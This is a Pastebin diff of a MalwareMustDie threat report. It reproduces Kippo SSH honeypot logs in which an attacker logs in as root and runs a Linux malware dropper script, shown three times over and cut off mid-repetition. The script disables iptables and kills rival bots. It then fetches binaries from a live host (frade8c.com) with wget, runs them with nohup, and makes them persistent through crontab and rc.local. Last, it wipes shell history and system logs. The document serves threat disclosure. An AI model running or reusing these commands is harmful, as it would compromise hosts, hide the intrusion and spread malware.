View difference between Paste ID: <a href="/f0RjPwiZ">f0RjPwiZ</a> and <a href="/Ubgvwz2f">Ubgvwz2f</a> - Pastebin.com

View difference between Paste ID: f0RjPwiZ and Ubgvwz2f

SHOW: | | - or go back to the newest paste.

#MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
#Follow report: still in the wild
warning: live URLs

#Reported log;

2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf
	apt-get -y install wget
	yum -y install wget
	chmod 7777 / etc
	killall -9 .IptabLes
	killall -9 nfsd4
	killall -9 profild.key
	cd /etc;rm -rf dir fake.cfg
	killall -9 nfsd
	killall -9 DDosl
	killall -9 lengchao32
	killall -9 b26
	killall -9 khelper
	killall -9 Bill
	killall -9 n26
	killall -9 007
	killall -9 codelove
	killall -9 32
	killall -9 m32
	killall -9 m64
	killall -9 64
	killall -9 83BOT 
	killall -9 82BOT
	killall -9 dos64
	killall -9 dos32
	killall -9 new6
	killall -9 new4
	killall -9 node24
	killall -9 mimi
	killall -9 nodeJR-1
	killall -9 freeBSD
	killall -9 ksapdd
	killall -9 106
	killall -9 09
	killall -9 xsw 
	killall -9 syslogd
	killall -9 skysapdd
	killall -9 cupsddd
	killall -9 ksapd
	killall -9 atddd
	killall -9 xfsdxd
	killall -9 sfewfesfs
	killall -9 gfhjrtfyhuf
	killall -9 rewgtf3er4t
	killall -9 fdsfsfvff
	killall -9 smarvtd
	killall -9 whitptabil
	killall -9 gdmorpen
	cd /etc;chattr -i 66
	cd /root; chmod 7777 / etc
	killall -9 minerd
	killall -9 syn
	killall -9 joudckfr
	killall -9 www
	killall -9 log
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .Mm2
	killall -9 acpid
	killall -9 m64 
	killall -9 ./QQ
	killall -9 aabb
	killall -9 g3
	killall -9 S99local
	killall -9 3
	killall -9 pm
	killall -9 qweasd
	killall -9 tangtang
	killall -9 imap-login
	killall -9 xudp
	killall -9 sshpa
	killall -9 008
	killall -9 txma
	killall -9 mrdos64.b00
	killall -9 mrdos32.b00
	killall -9 kkpklp
	killall -9 kiilp
	killall -9 xin1
	killall -9 jibateng
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 .mimeo 
	killall -9 .mimeo
	killall -9 .mimeo
	killall -9 .mimeop
	killall -9 .task1
	killall -9 .mimeop
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	cd /root;rm -rf dir nohup.out
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsddd.*
	cd /etc;rm -rf dir atddd.*
	cd /etc;rm -rf dir ksapdd.*
	cd /etc;rm -rf dir kysapdd.*
	cd /etc;rm -rf dir sksapdd.*
	cd /etc;rm -rf dir skysapdd.*
	cd /etc;rm -rf dir xfsdxd.*
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsdd.*
	cd /etc;rm -rf dir atdd.*
	cd /etc;rm -rf dir ksapd.*
	cd /etc;rm -rf dir kysapd.*
	cd /etc;rm -rf dir sksapd.*
	cd /etc;rm -rf dir skysapd.*
	cd /etc;rm -rf dir xfsdx.*
	cd /etc;rm -rf dir sfewfesfs
	cd /etc;rm -rf dir gfhjrtfyhuf
	cd /etc;rm -rf dir rewgtf3er4t
	cd /etc;rm -rf dir fdsfsfvff
	cd /etc;rm -rf dir smarvtd
	cd /etc;rm -rf dir whitptabil
	cd /etc;rm -rf dir gdmorpen
	cd /etc;rm -rf dir sfewfesfs.*
	cd /etc;rm -rf dir gfhjrtfyhuf.*
	cd /etc;rm -rf dir rewgtf3er4t.*
	cd /etc;rm -rf dir fdsfsfvff.*
	cd /etc;rm -rf dir smarvtd.*
	cd /etc;rm -rf dir whitptabil.*
	cd /etc;rm -rf dir gdmorpen.*
	cd /etc;rm -rf dir nhgbhhj.*
	cd /tmp;rm -rf dir 1.*
	cd /tmp;rm -rf dir 2.*
	cd /tmp;rm -rf dir 3.*
	cd /tmp;rm -rf dir 4.*
	cd /tmp;rm -rf dir 5.*
	cd /tmp;rm -rf dir jdhe
	cd /tmp;rm -rf dir jdhe.*
	cd /var/spool/cron; rm -rf dir root.*
	cd /var/spool/cron; rm -rf dir root
	cd /var/spool/cron/crontabs; rm -rf dir root.*
	cd /var/spool/cron/crontabs; rm -rf dir root
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
	yes|mv /tmp/root /var/spool/cron
	yes|mv /tmp/root /var/spool/cron/crontabs
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
	cd /etc;wget -c http://www.frade8c.com:9162/byv832
	cd /tmp;chmod 7777 jdhe
	cd /etc;chmod 7777 nhgbhhj
	cd /etc;chmod 7777 byv832
	cd /etc;chmod 7777 sfewfesfs
	cd /etc;chmod 7777 gfhjrtfyhuf
	cd /etc;chmod 7777 rewgtf3er4t
	cd /etc;chmod 7777 fdsfsfvff
	cd /etc;chmod 7777 smarvtd
	cd /etc;chmod 7777 whitptabil
	cd /etc;chmod 7777 gdmorpen
	cd /tmp;chmod 7777 nhgbhhj
	cd /tmp;chmod 7777 byv832
	cd /tmp;chmod 7777 sfewfesfs
	cd /tmp;chmod 7777 gfhjrtfyhuf
	cd /tmp;chmod 7777 rewgtf3er4t
	cd /tmp;chmod 7777 fdsfsfvff
	cd /tmp;chmod 7777 smarvtd
	cd /tmp;chmod 7777 whitptabil
	cd /tmp;chmod 7777 gdmorpen
	cd /tmp;./jdhe
	nohup /etc/sfewfesfs > /dev/null 2>&1&
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&
	nohup /etc/fdsfsfvff > /dev/null 2>&1&
	nohup /etc/smarvtd > /dev/null 2>&1&
	nohup /etc/whitptabil > /dev/null 2>&1&
	nohup /etc/gdmorpen > /dev/null 2>&1&
	nohup /etc/nhgbhhj > /dev/null 2>&1&
	nohup /etc/byv832 > /dev/null 2>&1&
	nohup /tmp/sfewfesfs > /dev/null 2>&1&
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&
	nohup /tmp/smarvtd > /dev/null 2>&1&
	nohup /tmp/whitptabil > /dev/null 2>&1&
	nohup /tmp/gdmorpen > /dev/null 2>&1&
	nohup /tmp/nhgbhhj > /dev/null 2>&1&
	nohup /tmp/byv832 > /dev/null 2>&1&
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /etc;./smarvtd" >> /etc/rc.local 
	echo "cd /etc;./whitptabil" >> /etc/rc.local 
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 
	echo "unset MAILCHECK" >> /etc/profile
	cd /etc;chattr +i sfewfesfs
	rm -rf /root/.bash_history
	touch /root/.bash_history
	history -r
	cd /var/log > dmesg 
	cd /var/log > auth.log 
	cd /var/log > alternatives.log 
	cd /var/log > boot.log 
	cd /var/log > btmp 
	cd /var/log > cron 
	cd /var/log > cups 
	cd /var/log > daemon.log 
	cd /var/log > dpkg.log 
	cd /var/log > faillog 
	cd /var/log > kern.log 
	cd /var/log > lastlog
	cd /var/log > maillog 
	cd /var/log > user.log 
	cd /var/log > Xorg.x.log 
	cd /var/log > anaconda.log 
	cd /var/log > yum.log 
	cd /var/log > secure
	cd /var/log > wtmp
	cd /var/log > utmp 
	cd /var/log > messages
	cd /var/log > spooler
	cd /var/log > sudolog
	cd /var/log > aculog
	cd /var/log > access-log
	cd /root > .bash_history
	history -c"
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf
	apt-get -y install wget
	yum -y install wget
	chmod 7777 / etc
	killall -9 .IptabLes
	killall -9 nfsd4
	killall -9 profild.key
	cd /etc;rm -rf dir fake.cfg
	killall -9 nfsd
	killall -9 DDosl
	killall -9 lengchao32
	killall -9 b26
	killall -9 khelper
	killall -9 Bill
	killall -9 n26
	killall -9 007
	killall -9 codelove
	killall -9 32
	killall -9 m32
	killall -9 m64
	killall -9 64
	killall -9 83BOT 
	killall -9 82BOT
	killall -9 dos64
	killall -9 dos32
	killall -9 new6
	killall -9 new4
	killall -9 node24
	killall -9 mimi
	killall -9 nodeJR-1
	killall -9 freeBSD
	killall -9 ksapdd
	killall -9 106
	killall -9 09
	killall -9 xsw 
	killall -9 syslogd
	killall -9 skysapdd
	killall -9 cupsddd
	killall -9 ksapd
	killall -9 atddd
	killall -9 xfsdxd
	killall -9 sfewfesfs
	killall -9 gfhjrtfyhuf
	killall -9 rewgtf3er4t
	killall -9 fdsfsfvff
	killall -9 smarvtd
	killall -9 whitptabil
	killall -9 gdmorpen
	cd /etc;chattr -i 66
	cd /root; chmod 7777 / etc
	killall -9 minerd
	killall -9 syn
	killall -9 joudckfr
	killall -9 www
	killall -9 log
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .Mm2
	killall -9 acpid
	killall -9 m64 
	killall -9 ./QQ
	killall -9 aabb
	killall -9 g3
	killall -9 S99local
	killall -9 3
	killall -9 pm
	killall -9 qweasd
	killall -9 tangtang
	killall -9 imap-login
	killall -9 xudp
	killall -9 sshpa
	killall -9 008
	killall -9 txma
	killall -9 mrdos64.b00
	killall -9 mrdos32.b00
	killall -9 kkpklp
	killall -9 kiilp
	killall -9 xin1
	killall -9 jibateng
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 .mimeo 
	killall -9 .mimeo
	killall -9 .mimeo
	killall -9 .mimeop
	killall -9 .task1
	killall -9 .mimeop
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	cd /root;rm -rf dir nohup.out
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsddd.*
	cd /etc;rm -rf dir atddd.*
	cd /etc;rm -rf dir ksapdd.*
	cd /etc;rm -rf dir kysapdd.*
	cd /etc;rm -rf dir sksapdd.*
	cd /etc;rm -rf dir skysapdd.*
	cd /etc;rm -rf dir xfsdxd.*
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsdd.*
	cd /etc;rm -rf dir atdd.*
	cd /etc;rm -rf dir ksapd.*
	cd /etc;rm -rf dir kysapd.*
	cd /etc;rm -rf dir sksapd.*
	cd /etc;rm -rf dir skysapd.*
	cd /etc;rm -rf dir xfsdx.*
	cd /etc;rm -rf dir sfewfesfs
	cd /etc;rm -rf dir gfhjrtfyhuf
	cd /etc;rm -rf dir rewgtf3er4t
	cd /etc;rm -rf dir fdsfsfvff
	cd /etc;rm -rf dir smarvtd
	cd /etc;rm -rf dir whitptabil
	cd /etc;rm -rf dir gdmorpen
	cd /etc;rm -rf dir sfewfesfs.*
	cd /etc;rm -rf dir gfhjrtfyhuf.*
	cd /etc;rm -rf dir rewgtf3er4t.*
	cd /etc;rm -rf dir fdsfsfvff.*
	cd /etc;rm -rf dir smarvtd.*
	cd /etc;rm -rf dir whitptabil.*
	cd /etc;rm -rf dir gdmorpen.*
	cd /etc;rm -rf dir nhgbhhj.*
	cd /tmp;rm -rf dir 1.*
	cd /tmp;rm -rf dir 2.*
	cd /tmp;rm -rf dir 3.*
	cd /tmp;rm -rf dir 4.*
	cd /tmp;rm -rf dir 5.*
	cd /tmp;rm -rf dir jdhe
	cd /tmp;rm -rf dir jdhe.*
	cd /var/spool/cron; rm -rf dir root.*
	cd /var/spool/cron; rm -rf dir root
	cd /var/spool/cron/crontabs; rm -rf dir root.*
	cd /var/spool/cron/crontabs; rm -rf dir root
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
	yes|mv /tmp/root /var/spool/cron
	yes|mv /tmp/root /var/spool/cron/crontabs
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
	cd /etc;wget -c http://www.frade8c.com:9162/byv832
	cd /tmp;chmod 7777 jdhe
	cd /etc;chmod 7777 nhgbhhj
	cd /etc;chmod 7777 byv832
	cd /etc;chmod 7777 sfewfesfs
	cd /etc;chmod 7777 gfhjrtfyhuf
	cd /etc;chmod 7777 rewgtf3er4t
	cd /etc;chmod 7777 fdsfsfvff
	cd /etc;chmod 7777 smarvtd
	cd /etc;chmod 7777 whitptabil
	cd /etc;chmod 7777 gdmorpen
	cd /tmp;chmod 7777 nhgbhhj
	cd /tmp;chmod 7777 byv832
	cd /tmp;chmod 7777 sfewfesfs
	cd /tmp;chmod 7777 gfhjrtfyhuf
	cd /tmp;chmod 7777 rewgtf3er4t
	cd /tmp;chmod 7777 fdsfsfvff
	cd /tmp;chmod 7777 smarvtd
	cd /tmp;chmod 7777 whitptabil
	cd /tmp;chmod 7777 gdmorpen
	cd /tmp;./jdhe
	nohup /etc/sfewfesfs > /dev/null 2>&1&
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&
	nohup /etc/fdsfsfvff > /dev/null 2>&1&
	nohup /etc/smarvtd > /dev/null 2>&1&
	nohup /etc/whitptabil > /dev/null 2>&1&
	nohup /etc/gdmorpen > /dev/null 2>&1&
	nohup /etc/nhgbhhj > /dev/null 2>&1&
	nohup /etc/byv832 > /dev/null 2>&1&
	nohup /tmp/sfewfesfs > /dev/null 2>&1&
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&
	nohup /tmp/smarvtd > /dev/null 2>&1&
	nohup /tmp/whitptabil > /dev/null 2>&1&
	nohup /tmp/gdmorpen > /dev/null 2>&1&
	nohup /tmp/nhgbhhj > /dev/null 2>&1&
	nohup /tmp/byv832 > /dev/null 2>&1&
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /etc;./smarvtd" >> /etc/rc.local 
	echo "cd /etc;./whitptabil" >> /etc/rc.local 
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 
	echo "unset MAILCHECK" >> /etc/profile
	cd /etc;chattr +i sfewfesfs
	rm -rf /root/.bash_history
	touch /root/.bash_history
	history -r
	cd /var/log > dmesg 
	cd /var/log > auth.log 
	cd /var/log > alternatives.log 
	cd /var/log > boot.log 
	cd /var/log > btmp 
	cd /var/log > cron 
	cd /var/log > cups 
	cd /var/log > daemon.log 
	cd /var/log > dpkg.log 
	cd /var/log > faillog 
	cd /var/log > kern.log 
	cd /var/log > lastlog
	cd /var/log > maillog 
	cd /var/log > user.log 
	cd /var/log > Xorg.x.log 
	cd /var/log > anaconda.log 
	cd /var/log > yum.log 
	cd /var/log > secure
	cd /var/log > wtmp
	cd /var/log > utmp 
	cd /var/log > messages
	cd /var/log > spooler
	cd /var/log > sudolog
	cd /var/log > aculog
	cd /var/log > access-log
	cd /root > .bash_history
	history -c"
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf
	apt-get -y install wget
	yum -y install wget
	chmod 7777 / etc
	killall -9 .IptabLes
	killall -9 nfsd4
	killall -9 profild.key
	cd /etc;rm -rf dir fake.cfg
	killall -9 nfsd
	killall -9 DDosl
	killall -9 lengchao32
	killall -9 b26
	killall -9 khelper
	killall -9 Bill
	killall -9 n26
	killall -9 007
	killall -9 codelove
	killall -9 32
	killall -9 m32
	killall -9 m64
	killall -9 64
	killall -9 83BOT 
	killall -9 82BOT
	killall -9 dos64
	killall -9 dos32
	killall -9 new6
	killall -9 new4
	killall -9 node24
	killall -9 mimi
	killall -9 nodeJR-1
	killall -9 freeBSD
	killall -9 ksapdd
	killall -9 106
	killall -9 09
	killall -9 xsw 
	killall -9 syslogd
	killall -9 skysapdd
	killall -9 cupsddd
	killall -9 ksapd
	killall -9 atddd
	killall -9 xfsdxd
	killall -9 sfewfesfs
	killall -9 gfhjrtfyhuf
	killall -9 rewgtf3er4t
	killall -9 fdsfsfvff
	killall -9 smarvtd
	killall -9 whitptabil
	killall -9 gdmorpen
	cd /etc;chattr -i 66
	cd /root; chmod 7777 / etc
	killall -9 minerd
	killall -9 syn
	killall -9 joudckfr
	killall -9 www
	killall -9 log
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .Mm2
	killall -9 acpid
	killall -9 m64 
	killall -9 ./QQ
	killall -9 aabb
	killall -9 g3
	killall -9 S99local
	killall -9 3
	killall -9 pm
	killall -9 qweasd
	killall -9 tangtang
	killall -9 imap-login
	killall -9 xudp
	killall -9 sshpa
	killall -9 008
	killall -9 txma
	killall -9 mrdos64.b00
	killall -9 mrdos32.b00
	killall -9 kkpklp
	killall -9 kiilp
	killall -9 xin1
	killall -9 jibateng
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 syscore.sh
	killall -9 .mimeo 
	killall -9 .mimeo
	killall -9 .mimeo
	killall -9 .mimeop
	killall -9 .task1
	killall -9 .mimeop
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	cd /root;rm -rf dir nohup.out
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsddd.*
	cd /etc;rm -rf dir atddd.*
	cd /etc;rm -rf dir ksapdd.*
	cd /etc;rm -rf dir kysapdd.*
	cd /etc;rm -rf dir sksapdd.*
	cd /etc;rm -rf dir skysapdd.*
	cd /etc;rm -rf dir xfsdxd.*
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsdd.*
	cd /etc;rm -rf dir atdd.*
	cd /etc;rm -rf dir ksapd.*
	cd /etc;rm -rf dir kysapd.*
	cd /etc;rm -rf dir sksapd.*
	cd /etc;rm -rf dir skysapd.*
	cd /etc;rm -rf dir xfsdx.*
	cd /etc;rm -rf dir sfewfesfs
	cd /etc;rm -rf dir gfhjrtfyhuf
	cd /etc;rm -rf dir rewgtf3er4t
	cd /etc;rm -rf dir fdsfsfvff
	cd /etc;rm -rf dir smarvtd
	cd /etc;rm -rf dir whitptabil
	cd /etc;rm -rf dir gdmorpen
	cd /etc;rm -rf dir sfewfesfs.*
	cd /etc;rm -rf dir gfhjrtfyhuf.*
	cd /etc;rm -rf dir rewgtf3er4t.*
	cd /etc;rm -rf dir fdsfsfvff.*
	cd /etc;rm -rf dir smarvtd.*
	cd /etc;rm -rf dir whitptabil.*
	cd /etc;rm -rf dir gdmorpen.*
	cd /etc;rm -rf dir nhgbhhj.*
	cd /tmp;rm -rf dir 1.*
	cd /tmp;rm -rf dir 2.*
	cd /tmp;rm -rf dir 3.*
	cd /tmp;rm -rf dir 4.*
	cd /tmp;rm -rf dir 5.*
	cd /tmp;rm -rf dir jdhe
	cd /tmp;rm -rf dir jdhe.*
	cd /var/spool/cron; rm -rf dir root.*
	cd /var/spool/cron; rm -rf dir root
	cd /var/spool/cron/crontabs; rm -rf dir root.*
	cd /var/spool/cron/crontabs; rm -rf dir root
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
	yes|mv /tmp/root /var/spool/cron
	yes|mv /tmp/root /var/spool/cron/crontabs
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
	cd /etc;wget -c http://www.frade8c.com:9162/byv832
	cd /tmp;chmod 7777 jdhe
	cd /etc;chmod 7777 nhgbhhj
	cd /etc;chmod 7777 byv832
	cd /etc;chmod 7777 sfewfesfs
	cd /etc;chmod 7777 gfhjrtfyhuf
	cd /etc;chmod 7777 rewgtf3er4t
	cd /etc;chmod 7777 fdsfsfvff
	cd /etc;chmod 7777 smarvtd
	cd /etc;chmod 7777 whitptabil
	cd /etc;chmod 7777 gdmorpen
	cd /tmp;chmod 7777 nhgbhhj
	cd /tmp;chmod 7777 byv832
	cd /tmp;chmod 7777 sfewfesfs
	cd /tmp;chmod 7777 gfhjrtfyhuf
	cd /tmp;chmod 7777 rewgtf3er4t
	cd /tmp;chmod 7777 fdsfsfvff
	cd /tmp;chmod 7777 smarvtd
	cd /tmp;chmod 7777 whitptabil
	cd /tmp;chmod 7777 gdmorpen
	cd /tmp;./jdhe
	nohup /etc/sfewfesfs > /dev/null 2>&1&
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&
	nohup /etc/fdsfsfvff > /dev/null 2>&1&
	nohup /etc/smarvtd > /dev/null 2>&1&
	nohup /etc/whitptabil > /dev/null 2>&1&
	nohup /etc/gdmorpen > /dev/null 2>&1&
	nohup /etc/nhgbhhj > /dev/null 2>&1&
	nohup /etc/byv832 > /dev/null 2>&1&
	nohup /tmp/sfewfesfs > /dev/null 2>&1&
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&
	nohup /tmp/smarvtd > /dev/null 2>&1&
	nohup /tmp/whitptabil > /dev/null 2>&1&
	nohup /tmp/gdmorpen > /dev/null 2>&1&
	nohup /tmp/nhgbhhj > /dev/null 2>&1&
	nohup /tmp/byv832 > /dev/null 2>&1&
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 
	echo "cd /etc;./smarvtd" >> /etc/rc.local 
	echo "cd /etc;./whitptabil" >> /etc/rc.local 
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 
	echo "unset MAILCHECK" >> /etc/profile
	cd /etc;chattr +i sfewfesfs
	rm -rf /root/.bash_history
	touch /root/.bash_history
	history -r
	cd /var/log > dmesg 
	cd /var/log > auth.log 
	cd /var/log > alternatives.log 
	cd /var/log > boot.log 
	cd /var/log > btmp 
	cd /var/log > cron 
	cd /var/log > cups 
	cd /var/log > daemon.log 
	cd /var/log > dpkg.log 
	cd /var/log > faillog 
	cd /var/log > kern.log 
	cd /var/log > lastlog
	cd /var/log > maillog 
	cd /var/log > user.log 
	cd /var/log > Xorg.x.log 
	cd /var/log > anaconda.log 
	cd /var/log > yum.log 
	cd /var/log > secure
	cd /var/log > wtmp
	cd /var/log > utmp 
	cd /var/log > messages
	cd /var/log > spooler
	cd /var/log > sudolog
	cd /var/log > aculog
	cd /var/log > access-log
	cd /root > .bash_history
	history -c"
2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf
	apt-get -y install wget
	yum -y install wget
	chmod 7777 / etc
	killall -9 .IptabLes
	killall -9 nfsd4
	killall -9 profild.key
	cd /etc;rm -rf dir fake.cfg
	killall -9 nfsd
	killall -9 DDosl
	killall -9 lengchao32
	killall -9 b26
	killall -9 khelper
	killall -9 Bill
	killall -9 n26
	killall -9 007
	killall -9 codelove
	killall -9 32
	killall -9 m32
	killall -9 m64
	killall -9 64
	killall -9 83BOT 
	killall -9 82BOT
	killall -9 dos64
	killall -9 dos32
	killall -9 new6
	killall -9 new4
	killall -9 node24
	killall -9 mimi
	killall -9 nodeJR-1
	killall -9 freeBSD
	killall -9 ksapdd
	killall -9 106
	killall -9 09
	killall -9 xsw 
	killall -9 syslogd
	killall -9 skysapdd
	killall -9 cupsddd
	killall -9 ksapd
	killall -9 atddd
	killall -9 xfsdxd
	killall -9 sfewfesfs
	killall -9 gfhjrtfyhuf
	killall -9 rewgtf3er4t
	killall -9 fdsfsfvff
	killall -9 smarvtd
	killall -9 whitptabil
	killall -9 gdmorpen
	cd /etc;chattr -i 66
	cd /root; chmod 7777 / etc
	killall -9 minerd
	killall -9 syn
	killall -9 joudckfr
	killall -9 www
	killall -9 log
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .Mm2
	killall -9 acpid
	killall -9 m64 
	killall -9 ./QQ
	killall -9 aabb
	killall -9 g3
	killall -9 S99local
	killall -9 3
	killall -9 pm
	killall -9 qweasd
	killall -9 tangtang
	killall -9 imap-login
	killall -9 xudp
	killall -9 sshpa
	killall -9 008
	killall -9 txma
	killall -9 mrdos64.b00
	killall -9 mrdos32.b00
	killall -9 kkpklp
	killall -9 kiilp
	killall -9 xin1
	killall -9 jibateng
	killall -9 syscore.sh
	killall -9 syscore.sh
